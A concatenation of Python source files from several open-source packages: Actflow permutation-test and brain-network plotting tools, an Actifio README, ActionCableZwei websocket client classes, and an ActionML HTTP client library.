p (optional) : Array of FWE-corrected p-values (Mx1 vector, for M tests);
N.B.: Only works for paired one-sample t-tests
"""
# Calculating the TRUE Pearson correlations in a vectorized format (increasing speed)
data_normed = stats.zscore(data_arr,axis=1)
behav_normed = stats.zscore(behav_arr)
trueR = np.mean(np.multiply(behav_normed,data_normed),axis=1)
# Prepare inputs for multiprocessing
inputs = []
for i in range(permutations):
seed = np.random.randint(0,100000,1)[0]
inputs.append((data_normed,behav_normed,tail,seed))
pool = mp.Pool(processes=nproc)
result = pool.map_async(_maxRpermutation,inputs).get()
pool.close()
pool.join()
# Returns an array of T-values distributions (our null distribution of "max-T" values)
maxR_dist = np.asarray(result)
#Find threshold for alpha
maxR_dist_sorted = np.sort(maxR_dist)
# Specify which tail we want
if tail == 1:
topPercVal_maxR_inx = int(len(maxR_dist_sorted)*(1-alpha))
maxR_thresh = maxR_dist_sorted[topPercVal_maxR_inx]
elif tail == -1:
topPercVal_maxR_inx = int(len(maxR_dist_sorted)*(alpha))
maxR_thresh = maxR_dist_sorted[topPercVal_maxR_inx]
elif tail == 2:
topPercVal_maxR_inx = int(len(maxR_dist_sorted)*(1-alpha))
maxR_thresh = maxR_dist_sorted[topPercVal_maxR_inx]
# elif tail == 0:
# topPercVal_maxR_inx = int(len(maxR_dist_sorted)*(alpha/2.0))
# botPercVal_maxR_inx = int(len(maxR_dist_sorted)*(1-alpha/2.0))
# # Provide two r thresholds for two-tailed test
# topR_thresh = maxR_dist_sorted[topPercVal_maxR_inx]
# botR_thresh = maxR_dist_sorted[botPercVal_maxR_inx]
if pvals:
# Construct ECDF from maxT_dist
ecdf = ECDF(maxR_dist)
# Return p-values from maxT_dist using our empirical CDF (FWE-corrected p-values)
p_fwe = ecdf(trueR)
if tail == 1 or tail == 2:
p_fwe = 1.0 - p_fwe
#if tail!=0:
return trueR, maxR_thresh, p_fwe
else:
#if tail!=0:
return trueR, maxR_thresh
def _maxRpermutation(data_normed,behav_normed,tail,seed):
"""
Helper function to perform a single permutation
Assumes the first row are the labels (or behavioral measures)
"""
np.random.seed(seed)
# Randomly permute behavioral data along 2nd dimension (subjects). Note: np.random.shuffle() requires transposes
np.take(behav_normed,np.random.rand(len(behav_normed)).argsort(),out=behav_normed)
# Randomly permute measurement data along 2nd dimension (subjects). Note: np.random.shuffle() requires transposes
#np.take(data_normed,np.random.rand(data_normed.shape[1]).argsort(),axis=1,out=data_normed)
# Calculating Pearson correlations in a vectorized format (increasing speed)
r_values = np.mean(np.multiply(behav_normed,data_normed),axis=1)
if tail==1:
maxR = np.max(r_values)
elif tail==-1:
maxR = np.min(r_values)
elif tail==2:
maxR = np.max(np.abs(r_values))
return maxR | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/tools/max_r.py | max_r.py |
import numpy as np
import matplotlib.pyplot as plt;
import matplotlib.patches as patches;
import matplotlib.colors as colors
import seaborn as sns
def addNetColors(fcMatrix):
""" A function to generate a heatmap figure with CAB-NP colors added along axes of FC matrix; python 3
INPUT
fcMatrix: a node x node matrix of FC estimates (in the Glasser parcellation, this would be 360 x 360, and presumably the 'grand mean' across subjects and states)
Note: fcMatrix nodes should be sorted into their network order
OUTPUT
fig: a handle for the generated figure, can be used to save it, ex python code:
fig = addNetColors(fcMatrix)
figDirectory = '/path/to/your/figure/directory/here/';
figFileName = figDirectory + 'figureName.png'; fig.savefig(figFileName, bbox_inches='tight', format='png', dpi=250);
"""
# CAB-NP & Glasser parcellation variables
orderedNetworks = ['VIS1','VIS2','SMN','CON','DAN','LAN','FPN','AUD','DMN','PMM','VMM','ORA']
colorList = [(0, 0, 1),(0.3922, 0, 1),(0, 1, 1),(0.6, 0, 0.6),(0, 1, 0),(0, 0.6, 0.6),(1, 1, 0),(0.98, 0.24, 0.98),(1, 0, 0),(0.7, 0.35, 0.16),(1, 0.6, 0),(0.25, 0.5, 0)];
netBoundaries = [(0,5,6),(6,59,54),(60,98,39),(99,154,56),(155,177,23),(178,200,23),(201,250,50),(251,265,15),(266,342,77),(343,349,7),(350,353,4),(354,359,6)];
[nParcels,nParcels] = np.shape(fcMatrix);
[numNets,c] = np.shape(colorList);
# Make room in FC matrix for network colors
bottomSize = (10,nParcels); topSize = (nParcels+10,10);
bottomBuff = np.zeros(bottomSize); topBuff = np.zeros(topSize);
bottomBuff = (bottomBuff+1)*0.31; topBuff = (topBuff+1)*0.31; # 0.31 is somewhat arbitrary, if it looks funny, change this number
bottomAdd = np.vstack((fcMatrix,bottomBuff)); fcMatrixWithBuffer = np.hstack((bottomAdd,topBuff));
np.fill_diagonal(fcMatrixWithBuffer, 0);
#return fcMatrixWithBuffer;
# Generate figure
fig,ax = plt.subplots(1,figsize=(7,7),facecolor=(1,1,1))
v_min = np.min(fcMatrix)
v_max = np.max(fcMatrix)
v_mid = 0
plt.imshow(fcMatrixWithBuffer,origin='upper',cmap='seismic', interpolation='none', norm=MidpointNormalize(midpoint=v_mid,vmin=v_min, vmax=v_max), clim=(v_min, v_max));
#sns.heatmap(fcMatrixWithBuffer,square=True,center=0,cmap='seismic',cbar=True,xticklabels=50,yticklabels=50)
plt.ylabel('Regions',fontsize=20); plt.xlabel('Regions',fontsize=20);
cBarH = plt.colorbar(fraction=.045);
cBarH.set_label('FC Estimates', size=15);
plt.subplots_adjust(left=None, bottom=None, right=1, top=1, wspace=1, hspace=1);
# Add network colors to the "buffered" axes
netList = list(range(numNets));
for net in netList:
thisNet = netBoundaries[net]; netSize = thisNet[2]; netStart = thisNet[0];
rectH = patches.Rectangle((netStart-1,359),netSize,10,linewidth=1,edgecolor=colorList[net],facecolor=colorList[net]);
rectV = patches.Rectangle((359,netStart-1),10,netSize,linewidth=1,edgecolor=colorList[net],facecolor=colorList[net]);
ax.add_patch(rectH); ax.add_patch(rectV);
rectWhite = patches.Rectangle((nParcels-1,nParcels-1),10,10,linewidth=1,edgecolor='white',facecolor='white'); ax.add_patch(rectWhite);
# set global params & show image
plt.box(0); cbLim = np.max([abs(np.min(fcMatrixWithBuffer)),np.max(fcMatrixWithBuffer)]);
#plt.clim(round(cbLim*-1,1),round(cbLim,1)); cBarH.outline.set_visible(False);
plt.rc('ytick',labelsize=10); plt.rc('xtick',labelsize=10);
ax.tick_params(axis=u'both', which=u'both',length=0); plt.box(0);
plt.show()
return fig; # can use this output to save generated figure in Jupyter notebook, etc.
class MidpointNormalize(colors.Normalize):
"""
Normalise the colorbar so that diverging bars work there way either side from a prescribed midpoint value)
e.g. im=ax1.imshow(array, norm=MidpointNormalize(midpoint=0.,vmin=-100, vmax=100))
"""
def __init__(self, vmin=None, vmax=None, midpoint=None, clip=False):
self.midpoint = midpoint
colors.Normalize.__init__(self, vmin, vmax, clip)
def __call__(self, value, clip=None):
# I'm ignoring masked values and all kinds of edge cases to make a
# simple example...
x, y = [self.vmin, self.midpoint, self.vmax], [0, 0.5, 1]
return np.ma.masked_array(np.interp(value, x, y), np.isnan(value)) | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/tools/addNetColors.py | addNetColors.py |
import numpy as np
import scipy.stats as stats
import multiprocessing as mp
from statsmodels.distributions.empirical_distribution import ECDF
from functools import partial
def max_t(input_arr, nullmean=0, alpha=.05, tail=2, permutations=1000, nproc=1, pvals=True, output_nulldist=False, nan_policy='propagate'):
"""
Performs family-wise ersror correction using permutation testing (Nichols & Holmes 2002).
This function runs a one-sample t-test vs. 0 or, equivalently, a paired t-test (if the user subtracts two conditions prior to input).
Assumes a two-sided t-test (specify tail of test by tail parameter).
Citation:
Nichols TE, Holmes AP. (2002). Nonparametric permutation tests for functional neuroimaging: A primer with Examples. Hum. Brain Mapp., 15: 1-25. doi:10.1002/hbm.1058
Required Parameters:
input_arr = MxN matrix of set of M independent observations across N subjects. M one-sample t-tests
(condition 1 vs. nullmean) or M paired t-tests (condition 1 minus condition 2) will be conducted,
correcting for multiple comparisons via the maxT approach.
Note that the user must subtract the two conditions prior to using this function in the
paired t-test case.
Optional Parameters:
nullmean = Expected value of the null hypothesis {default = 0, for a t-test against 0}
alpha = Optional. alpha value to return the maxT threshold {default = .05}
tail = Optional. [0, 1, or -1]
If tail = 1, reject the null hypothesis if the statistic is greater than the null dist (upper tailed test).
If tail = -1, reject the null hypothesis if the statistic is less than the null dist (lower tailed test).
If tail = 2, reject the null hypothesis for a two-tailed test
{default : 2}
permutations = Optional. Number of permutations to perform {default = 1000}
nproc = Optional. number of processes to run in parallel {default = 1}. NOTE: Could crash your Python session if it's set to a number over 1; it appears there is a bug that needs to be fixed.
pvals = Optional. if True, returns equivalent p-value distribution for all t-values {default = True}
nan_policy = Optional. What to do with NaN values when being sent to the t-test function. See scipy.stats.ttest_1samp (https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.ttest_1samp.html) for details. The default is to pass NaN values into the t-test function rather than ignoring them. {default = 'propagate'}
Returns:
t: Array of T-values of correct contrast map (Mx1 vector, for M tests)
maxTThreshold : The t-value threshold corresponding to the corrected alpha value. If a two-tailed test is specified, the maxR is provided as an absolute value
p (optional) : Array of FWE-corrected p-values (Mx1 vector, for M tests);
maxT_dist (optional): Array of maxT null distribution values
"""
# Focus on difference matrix -- more computationally feasible (and less data to feed into parallel processing)
# Prepare inputs for multiprocessing
seeds = np.zeros(permutations)
for i in np.arange(permutations):
seeds[i] = np.random.randint(0,100000,1)[0]
pool = mp.Pool(processes=nproc)
_maxTpermutation_partial=partial(_maxTpermutation, input_arr=input_arr, nullmean=nullmean, tail=tail, nan_policy=nan_policy)
result = pool.map_async(_maxTpermutation_partial,seeds).get()
pool.close()
pool.join()
# Returns an array of T-values distributions (our null distribution of "max-T" values)
maxT_dist = np.asarray(result)
#Find threshold for alpha
maxT_dist_sorted = np.sort(maxT_dist)
# Specify which tail we want
if tail == 1:
topPercVal_maxT_inx = int(len(maxT_dist_sorted)*(1-alpha))
maxT_thresh = maxT_dist_sorted[topPercVal_maxT_inx]
elif tail == -1:
topPercVal_maxT_inx = int(len(maxT_dist_sorted)*(alpha))
maxT_thresh = maxT_dist_sorted[topPercVal_maxT_inx]
elif tail == 2:
topPercVal_maxT_inx = int(len(maxT_dist_sorted)*(1-alpha))
maxT_thresh = maxT_dist_sorted[topPercVal_maxT_inx]
# Obtain real t-values
t = stats.ttest_1samp(input_arr, nullmean, axis=1, nan_policy=nan_policy)[0]
if pvals:
# # Construct ECDF from maxT_dist
# ecdf = ECDF(maxT_dist)
# # Return p-values from maxT_dist using our empirical CDF (FWE-corrected p-values)
# p_fwe = ecdf(t)
# if tail == 1 or tail == 2:
# p_fwe = 1.0 - p_fwes
if tail==1:
#Percent of null t-values greater than observed t-value
p_fwe = np.array([np.mean(maxT_dist>=tval) for tval in t])
elif tail==-1:
#Percent of null t-values less than observed t-value
p_fwe = np.array([np.mean(maxT_dist<=tval) for tval in t])
elif tail==2:
#Percent of null t-values greater or less than observed t-value (the abs value in null distribution accounts for 2 tails)
p_fwe = np.array([np.mean(maxT_dist>=np.abs(tval)) for tval in t])
if output_nulldist:
return t, maxT_thresh, p_fwe, maxT_dist
else:
return t, maxT_thresh, p_fwe
else:
if output_nulldist:
return t, maxT_thresh, maxT_dist
else:
return t, maxT_thresh
def _maxTpermutation(seed,input_arr,nullmean,tail,nan_policy='propagate'):
"""
Helper function to perform a single permutation
"""
np.random.seed(int(seed))
# Create a random matrix to shuffle conditions (randomly multiply contrasts by 1 or -1)
shufflemat = np.random.normal(0,1,input_arr.shape)
pos = shufflemat > 0
neg = shufflemat < 0
# matrix of 1 and -1
shufflemat = pos + neg*(-1)
# Shuffle raw values
input_arr = np.multiply(input_arr, shufflemat)
# Take t-test against 0 for each independent test
t_matrix = stats.ttest_1samp(input_arr,nullmean,axis=1, nan_policy=nan_policy)[0]
if tail==1:
maxT = np.max(t_matrix)
elif tail==-1:
maxT = np.min(t_matrix)
elif tail==2:
maxT = np.max(np.abs(t_matrix))
return maxT | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/tools/max_t.py | max_t.py |
# Actifio Python Client Library
This is a python package to handle Actifio RestAPI. Package wraps around the Rest API to facilitate for UDS and SARG functions. Package also provides functionality for higher functions.
# Install
To install, we always recomend using ```pip```.
```
pip install Actifio
```
# Documentation
You can find the documentation [here](https://actifio-python-client-library.readthedocs.io/en/latest/index.html).
License
-------
Copyright 2018 <Kosala Atapattu [email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
| Actifio | /Actifio-1.0.2.tar.gz/Actifio-1.0.2/README.md | README.md |
import threading
import uuid
import json
import logging
import time
import websocket
class Connection:
"""
The connection to a websocket server
"""
def __init__(self, url, origin=None, log_ping=False, cookie=None, header=None):
"""
:param url: The url of the cable server.
:param origin: (Optional) The origin.
:param log_ping: (Default: False) If true every
ping gets logged.
:param cookie: (Optional) A cookie to send (used for
authentication for instance).
:param header: (Optional) custom header for websocket handshake.
"""
self.url = url
self.origin = origin
self.log_ping = log_ping
self.cookie = cookie
self.header = header
self.logger = logging.getLogger('ActionCable Connection')
self.subscriptions = {}
self.websocket = None
self.ws_thread = None
self.auto_reconnect = False
if origin is not None:
self.origin = origin
def connect(self, origin=None):
"""
Connects to the server.
:param origin: (Optional) The origin.
"""
self.logger.debug('Establish connection...')
if self.connected:
self.logger.warning('Connection already established. Return...')
return
if origin is not None:
self.origin = origin
self.auto_reconnect = True
self.ws_thread = threading.Thread(
name="APIConnectionThread_{}".format(uuid.uuid1()),
target=self._run_forever)
self.ws_thread.daemon = True
self.ws_thread.start()
def disconnect(self):
"""
Closes the connection.
"""
self.logger.debug('Close connection...')
self.auto_reconnect = False
if self.websocket is not None:
self.websocket.close()
def _run_forever(self):
while self.auto_reconnect:
try:
self.logger.debug('Run connection loop.')
self.websocket = websocket.WebSocketApp(
self.url,
cookie=self.cookie,
header=self.header,
on_message=self._on_message,
on_close=self._on_close)
self.websocket.on_open = self._on_open
self.websocket.run_forever(ping_interval=5, ping_timeout=3, origin=self.origin)
time.sleep(2)
except Exception as exc:
self.logger.error('Connection loop raised exception. Exception: %s', exc)
def send(self, data):
"""
Sends data to the server.
"""
self.logger.debug('Send data: {}'.format(data))
if not self.connected:
self.logger.warning('Connection not established. Return...')
return
self.websocket.send(json.dumps(data))
def _on_open(self, socket):
"""
Called when the connection is open.
"""
self.logger.debug('Connection established.')
def _on_message(self, socket, message):
"""
Called aways when a message arrives.
"""
data = json.loads(message)
message_type = None
identifier = None
subscription = None
if 'type' in data:
message_type = data['type']
if 'identifier' in data:
identifier = json.loads(data['identifier'])
if identifier is not None:
subscription = self.find_subscription(identifier)
if subscription is not None:
subscription.received(data)
elif message_type == 'welcome':
self.logger.debug('Welcome message received.')
for subscription in self.subscriptions.values():
if subscription.state == 'connection_pending':
subscription.create()
elif message_type == 'ping':
if self.log_ping:
self.logger.debug('Ping received.')
else:
self.logger.warning('Message not supported. (Message: {})'.format(message))
def _on_close(self, socket):
"""
Called when the connection was closed.
"""
self.logger.debug('Connection closed.')
for subscription in self.subscriptions.values():
if subscription.state == 'subscribed':
subscription.state = 'connection_pending'
@property
def socket_present(self):
"""
If socket is present.
"""
return self.websocket is not None and self.websocket.sock is not None
@property
def connected(self):
"""
If connected to server.
"""
return self.websocket is not None and \
self.websocket.sock is not None and \
self.websocket.sock.connected
def find_subscription(self, identifier):
"""
Finds a subscription
by it's identifier.
"""
for subscription in self.subscriptions.values():
if subscription.identifier == identifier:
return subscription | ActionCableZwei | /ActionCableZwei-0.1.7.2.tar.gz/ActionCableZwei-0.1.7.2/actioncable/connection.py | connection.py |
import uuid
import json
import logging
class Subscription:
"""
Subscriptions on a server.
"""
def __init__(self, connection, identifier):
"""
:param connection: The connection which is used to subscribe.
:param identifier: (Optional) Additional identifier information.
"""
self.uuid = str(uuid.uuid1())
self.connection = connection
self.identifier = identifier
self.receive_callback = None
self.state = 'unsubcribed'
self.message_queue = []
self.logger = logging.getLogger('ActionCable Subscription ({})'.format(self.identifier))
self.connection.subscriptions[self.uuid] = self
def create(self):
"""
Subscribes at the server.
"""
self.logger.debug('Create subscription on server...')
if not self.connection.connected:
self.state = 'connection_pending'
return
data = {
'command': 'subscribe',
'identifier': self._identifier_string()
}
self.connection.send(data)
self.state = 'pending'
def remove(self):
"""
Removes the subscription.
"""
self.logger.debug('Remove subscription from server...')
data = {
'command': 'unsubscribe',
'identifier': self._identifier_string()
}
self.connection.send(data)
self.state = 'unsubscribed'
def send(self, message):
"""
Sends data to the server on the
subscription channel.
:param data: The JSON data to send.
"""
self.logger.debug('Send message: {}'.format(message))
if self.state == 'pending' or self.state == 'connection_pending':
self.logger.info('Connection not established. Add message to queue.')
self.message_queue.append(message)
return
elif self.state == 'unsubscribed' or self.state == 'rejected':
self.logger.warning('Not subscribed! Message discarded.')
return
data = {
'command': 'message',
'identifier': self._identifier_string(),
'data': message.raw_message()
}
self.connection.send(data)
def on_receive(self, callback):
"""
Called always if a message is
received on this channel.
:param callback: The reference to the callback function.
"""
self.logger.debug('On receive callback set.')
self.receive_callback = callback
def received(self, data):
"""
API for the connection to forward
information to this subscription instance.
:param data: The JSON data which was received.
:type data: Message
"""
self.logger.debug('Data received: {}'.format(data))
message_type = None
if 'type' in data:
message_type = data['type']
if message_type == 'confirm_subscription':
self._subscribed()
elif message_type == 'reject_subscription':
self._rejected()
elif self.receive_callback is not None and 'message' in data:
self.receive_callback(data['message'])
else:
self.logger.warning('Message type unknown. ({})'.format(message_type))
def _subscribed(self):
"""
Called when the subscription was
accepted successfully.
"""
self.logger.debug('Subscription confirmed.')
self.state = 'subscribed'
for message in self.message_queue:
self.send(message)
def _rejected(self):
"""
Called if the subscription was
rejected by the server.
"""
self.logger.warning('Subscription rejected.')
self.state = 'rejected'
self.message_queue = []
def _identifier_string(self):
return json.dumps(self.identifier) | ActionCableZwei | /ActionCableZwei-0.1.7.2.tar.gz/ActionCableZwei-0.1.7.2/actioncable/subscription.py | subscription.py |
try:
import Queue
except ImportError:
# pylint: disable=F0401
# http is a Python3 module, replacing httplib. Ditto.
import queue as Queue
import threading
try:
import httplib
except ImportError:
# pylint: disable=F0401
from http import client as httplib
try:
from urllib import urlencode
except ImportError:
# pylint: disable=F0401,E0611
from urllib.parse import urlencode
import datetime
import json
import logging
# use generators for python2 and python3
try:
xrange
except NameError:
xrange = range
# some constants
MAX_RETRY = 1 # 0 means no retry
# logger
logger = None
DEBUG_LOG = False
def enable_log(filename=None):
global logger
global DEBUG_LOG
timestamp = datetime.datetime.today()
if not filename:
logfile = "./log/actionml_%s.log" % timestamp.strftime(
"%Y-%m-%d_%H:%M:%S.%f")
else:
logfile = filename
logging.basicConfig(filename=logfile,
filemode='w',
level=logging.DEBUG,
format='[%(levelname)s] %(name)s (%(threadName)s) %(message)s')
logger = logging.getLogger(__name__)
DEBUG_LOG = True
class ActionMLAPIError(Exception):
pass
class NotSupportMethodError(ActionMLAPIError):
pass
class ProgramError(ActionMLAPIError):
pass
class AsyncRequest(object):
"""AsyncRequest object
"""
def __init__(self, method, path, **params):
self.method = method # "GET" "POST" etc
# the sub path eg. POST /v1/users.json GET /v1/users/1.json
self.path = path
# dictionary format eg. {"appkey" : 123, "id" : 3}
self.params = params
# use queue to implement response, store AsyncResponse object
self.response_q = Queue.Queue(1)
self.qpath = "%s?%s" % (self.path, urlencode(self.params))
self._response = None
# response function to be called to handle the response
self.response_handler = None
def __str__(self):
return "%s %s %s %s" % (self.method, self.path, self.params,
self.qpath)
def set_response_handler(self, handler):
self.response_handler = handler
def set_response(self, response):
""" store the response
NOTE: Must be only called once
"""
self.response_q.put(response)
def get_response(self):
"""
Get the response. Blocking.
:returns: self.response_handler's return type.
"""
if self._response is None:
tmp_response = self.response_q.get(True) # NOTE: blocking
if self.response_handler is None:
self._response = tmp_response
else:
self._response = self.response_handler(tmp_response)
return self._response
class AsyncResponse(object):
"""
Store the response of asynchronous request
When get the response, user should check if error is None (which means no Exception happens).
If error is None, then should check if the status is expected.
"""
def __init__(self):
#: exception object if any happens
self.error = None
self.version = None
self.status = None
self.reason = None
#: Response header. str
self.headers = None
#: Response body. str
self.body = None
#: Jsonified response body. Remains None if conversion is unsuccessful.
self.json_body = None
#: Point back to the AsyncRequest object
self.request = None
def __str__(self):
return "e:%s v:%s s:%s r:%s h:%s b:%s" % (self.error, self.version,
self.status, self.reason,
self.headers, self.body)
def set_resp(self, version, status, reason, headers, body):
self.version = version
self.status = status
self.reason = reason
self.headers = headers
self.body = body
# Try to extract the json.
try:
self.json_body = json.loads(body)
except ValueError as ex: # noqa
self.json_body = str(body)
def set_error(self, error):
self.error = error
class AsyncResponse(object):
"""
Store the response of asynchronous request
When get the response, user should check if error is None (which means no Exception happens).
If error is None, then should check if the status is expected.
"""
def __init__(self):
#: exception object if any happens
self.error = None
self.version = None
self.status = None
self.reason = None
#: Response header. str
self.headers = None
#: Response body. str
self.body = None
#: Jsonified response body. Remains None if conversion is unsuccessful.
self.json_body = None
#: Point back to the AsyncRequest object
self.request = None
def __str__(self):
return "e:%s v:%s s:%s r:%s h:%s b:%s" % (self.error, self.version,
self.status, self.reason,
self.headers, self.body)
def set_resp(self, version, status, reason, headers, body):
self.version = version
self.status = status
self.reason = reason
self.headers = headers
self.body = body
# Try to extract the json.
try:
self.json_body = json.loads(body.decode('utf8'))
except ValueError as ex:
self.json_body = body.decode()
def set_error(self, error):
self.error = error
def set_request(self, request):
self.request = request
class ActionMLHttpConnection(object):
def __init__(self, host, https=True, timeout=5):
if https: # https connection
self._connection = httplib.HTTPSConnection(host, timeout=timeout)
else:
self._connection = httplib.HTTPConnection(host, timeout=timeout)
def connect(self):
self._connection.connect()
def close(self):
self._connection.close()
def request(self, method, url, body={}, headers={}):
"""
http request wrapper function, with retry capability in case of error.
catch error exception and store it in AsyncResponse object
return AsyncResponse object
Args:
method: http method, type str
url: url path, type str
body: http request body content, type dict
header: http request header , type dict
"""
response = AsyncResponse()
try:
# number of retry in case of error (minimum 0 means no retry)
retry_limit = MAX_RETRY
mod_headers = dict(headers) # copy the headers
mod_headers["Connection"] = "keep-alive"
enc_body = None
if body: # if body is not empty
# enc_body = urlencode(body)
# mod_headers[
# "Content-type"] = "application/x-www-form-urlencoded"
enc_body = json.dumps(body)
mod_headers[
"Content-type"] = "application/json"
# mod_headers["Accept"] = "text/plain"
except Exception as e:
response.set_error(e)
return response
if DEBUG_LOG:
logger.debug("Request m:%s u:%s h:%s b:%s", method, url,
mod_headers, enc_body)
# retry loop
for i in xrange(retry_limit + 1):
try:
if i != 0:
if DEBUG_LOG:
logger.debug("retry request %s times" % i)
if self._connection.sock is None:
self._connection.connect()
self._connection.request(method, url, enc_body, mod_headers)
except Exception as e:
self._connection.close()
if i == retry_limit:
# new copy of e created everytime??
response.set_error(e)
else: # NOTE: this is try's else clause
# connect() and request() OK
try:
resp = self._connection.getresponse()
except Exception as e:
self._connection.close()
if i == retry_limit:
response.set_error(e)
else: # NOTE: this is try's else clause
# getresponse() OK
resp_version = resp.version # int
resp_status = resp.status # int
resp_reason = resp.reason # str
# resp.getheaders() returns list of tuples
# converted to dict format
resp_headers = dict(resp.getheaders())
# NOTE: have to read the response before sending out next
# http request
resp_body = resp.read() # str
response.set_resp(version=resp_version, status=resp_status,
reason=resp_reason, headers=resp_headers,
body=resp_body)
break # exit retry loop
# end of retry loop
if DEBUG_LOG:
logger.debug("Response %s", response)
return response # AsyncResponse object
def connection_worker(host, request_queue, https=True, timeout=5, loop=True):
"""worker function which establishes connection and wait for request jobs
from the request_queue
Args:
request_queue: the request queue storing the AsyncRequest object
valid requests:
GET
POST
DELETE
KILL
https: HTTPS (True) or HTTP (False)
timeout: timeout for HTTP connection attempts and requests in seconds
loop: This worker function stays in a loop waiting for request
For testing purpose only. should always be set to True.
:param loop:
:param timeout:
:param request_queue:
:param https:
:param host:
"""
connect = ActionMLHttpConnection(host, https, timeout)
# loop waiting for job form request queue
killed = not loop
while True:
# print "thread %s waiting for request" % thread.get_ident()
request = request_queue.get(True) # NOTE: blocking get
# print "get request %s" % request
method = request.method
if method == "GET":
path = request.qpath
d = connect.request("GET", path)
elif method == "POST":
path = request.path
body = request.params
d = connect.request("POST", path, body)
elif method == "DELETE":
path = request.qpath
d = connect.request("DELETE", path)
elif method == "KILL":
# tell the thread to kill the connection
killed = True
d = AsyncResponse()
else:
d = AsyncResponse()
d.set_error(NotSupportMethodError(
"Don't Support the method %s" % method))
d.set_request(request)
request.set_response(d)
request_queue.task_done()
if killed:
break
# end of while loop
connect.close()
class Connection(object):
"""abstract object for connection with server
spawn multiple connection_worker threads to handle jobs in the queue q
"""
def __init__(self, host, threads=1, qsize=0, https=True, timeout=5):
"""constructor
Args:
host: host of the server.
threads: type int, number of threads to be spawn
qsize: size of the queue q
https: indicate it is httpS (True) or http connection (False)
timeout: timeout for HTTP connection attempts and requests in
seconds
"""
self.host = host
self.https = https
self.q = Queue.Queue(qsize) # if qsize=0, means infinite
self.threads = threads
self.timeout = timeout
# start thread based on threads number
self.tid = {} # dictionary of thread object
for i in xrange(threads):
tname = "ActionMLThread-%s" % i # thread name
self.tid[i] = threading.Thread(
target=connection_worker, name=tname,
kwargs={'host': self.host, 'request_queue': self.q,
'https': self.https, 'timeout': self.timeout})
self.tid[i].setDaemon(True)
self.tid[i].start()
def make_request(self, request):
"""put the request into the q
"""
self.q.put(request)
def pending_requests(self):
"""number of pending requests in the queue
"""
return self.q.qsize()
def close(self):
"""close this Connection. Call this when main program exits
"""
# set kill message to q
for i in xrange(self.threads):
self.make_request(AsyncRequest("KILL", ""))
self.q.join() # wait for q empty
for i in xrange(self.threads): # wait for all thread finish
self.tid[i].join() | ActionML | /ActionML-0.0.10.tar.gz/ActionML-0.0.10/actionml/connection.py | connection.py |
__version__ = "0.0.10"
# import packages
import re
try:
import httplib
except ImportError:
# pylint: disable=F0401
# http is a Python3 module, replacing httplib
from http import client as httplib
try:
from urllib import quote
except ImportError:
# pylint: disable=F0401,E0611
from urllib.parse import quote
try:
from urllib import urlencode
except ImportError:
# pylint: disable=F0401,E0611
from urllib.parse import urlencode
from datetime import datetime
import pytz
from actionml.connection import Connection
from actionml.connection import AsyncRequest
from actionml.connection import AsyncResponse
from actionml.connection import ActionMLAPIError
class HttpError(ActionMLAPIError):
def __init__(self, message, response):
super(HttpError, self).__init__(message)
self.response = response
class UnexpectedStatusError(HttpError):
def __init__(self, response):
super(UnexpectedStatusError, self).__init__("Unexpected status: {}".format(response.status), response)
class NotImplementedError(HttpError):
def __init__(self, response):
super(NotImplementedError, self).__init__("Not Implemented: {}".format(response.request), response)
class BadRequestError(HttpError):
def __init__(self, response):
super(BadRequestError, self).__init__("Bad request: {}".format(response.request), response)
class NotFoundError(HttpError):
def __init__(self, response):
super(NotFoundError, self).__init__("Not found: {}".format(response.request), response)
def time_to_string_if_valid(t):
""" Validate event_time according to EventAPI Specification."""
if t is None:
return datetime.now(pytz.utc)
if type(t) != datetime:
raise AttributeError("event_time must be datetime.datetime")
if t.tzinfo is None:
raise AttributeError("event_time must have tzinfo")
# EventServer uses milliseconds, but python datetime class uses micro. Hence
# need to skip the last three digits.
return t.strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3] + t.strftime("%z")
class BaseClient(object):
def __init__(self, url, threads=1, qsize=0, timeout=5):
"""Constructor of Client object."""
self.threads = threads
self.url = url
self.qsize = qsize
self.timeout = timeout
# check connection type
https_pattern = r'^https://(.*)'
http_pattern = r'^http://(.*)'
m = re.match(https_pattern, url)
self.https = True
if m is None: # not matching https
m = re.match(http_pattern, url)
self.https = False
if m is None: # not matching http either
raise InvalidArgumentError("url is not valid: %s" % url)
self.host = m.group(1)
self._uid = None # identified uid
self._connection = Connection(
host=self.host,
threads=self.threads,
qsize=self.qsize,
https=self.https,
timeout=self.timeout
)
def close(self):
"""
Close this client and the connection.
Call this method when you want to completely terminate the connection with ActionML.
It will wait for all pending requests to finish.
"""
self._connection.close()
def pending_requests(self):
"""
Return the number of pending requests.
:returns: The number of pending requests of this client.
"""
return self._connection.pending_requests()
def get_status(self):
"""
Get the status of the ActionML API Server
:returns: status message.
:raises: ServerStatusError.
"""
path = "/"
request = AsyncRequest("GET", path)
request.set_response_handler(self._ok_response_handler)
self._connection.make_request(request)
result = request.get_response()
return result
def _add_segment(self, segment=None):
if segment is not None:
return "%s/%s" % (self.path, quote(segment, ""))
else:
return self.path
def _add_get_params(self, path=None, **params):
_path = self.path if path is None else path
return "%s?%s" % (_path, urlencode(params))
def _response_handler(self, expected_status, response):
if response.error is not None:
raise HttpError("Exception happened: {}".format(response.error), response)
elif response.status == httplib.NOT_IMPLEMENTED:
raise NotImplementedError(response)
elif response.status == httplib.BAD_REQUEST:
raise BadRequestError(response)
elif response.status == httplib.NOT_FOUND:
raise NotFoundError(response)
elif response.status != expected_status:
raise UnexpectedStatusError(response)
return response
def _create_response_handler(self, response):
return self._response_handler(httplib.CREATED, response)
